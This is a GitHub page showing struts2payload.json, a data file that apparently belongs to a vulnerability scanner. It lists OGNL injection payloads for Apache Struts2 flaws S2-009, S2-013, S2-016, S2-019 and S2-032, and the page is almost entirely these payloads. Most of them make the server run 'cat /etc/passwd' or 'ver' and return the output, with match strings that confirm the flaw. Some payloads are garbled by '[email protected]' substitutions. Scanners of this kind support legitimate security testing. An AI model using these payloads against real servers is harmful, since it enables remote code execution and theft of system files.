forked from aipengjie/vulscans
-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathstruts2payload.json
72 lines (72 loc) · 5.71 KB
/
struts2payload.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
[
{
"type": "s2-009",
"payload": [
{
"payload": "class.classLoader.jarPath=%28%23context['xwork.MethodAccessor.denyMethodExecution']%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess['allowStaticMethodAccess']%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /etc/passwd%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]",
"match": "root:",
"method": "post"
},
{
"payload": "class.classLoader.jarPath=%28%23context['xwork.MethodAccessor.denyMethodExecution']%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess['allowStaticMethodAccess']%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ver%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]",
"match": "Microsoft Windows",
"method": "post"
}
]
},
{
"type": "s2-013",
"payload": [
{
"payload": "a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRuntime().exec('cat /etc/passwd').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}",
"match": "root:",
"method": "post"
},
{
"payload": "a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRuntime().exec('ver').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}",
"match": "Microsoft Windows",
"method": "post"
}
]
},
{
"type": "s2-016",
"payload": [
{
"payload": "?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B%27cat%27,%27/etc/passwd%27%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"match": "root:",
"method": "get"
},
{
"payload": "?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B%27ver%27%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"match": "Microsoft Windows",
"method": "get"
}
]
},
{
"type": "s2-019",
"payload": [
{
"payload": "debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()",
"match": "root:",
"method": "post"
},
{
"payload": "debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ver'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()",
"match": "Microsoft Windows",
"method": "post"
}
]
},
{
"type": "s2-032",
"payload": [
{
"payload": "?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%28%23parameters.res%5B0%5D%29.getWriter%28%29%2C%23test.println%28%23parameters.command%5B0%5D%29%2C%23test.flush%28%29%2C%23test.close&res=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=%23%23%23Struts2%20S2-032%20Vulnerable%23%23%23",
"match": "###Struts2 S2-032 Vulnerable###",
"method": "get"
}
]
}
]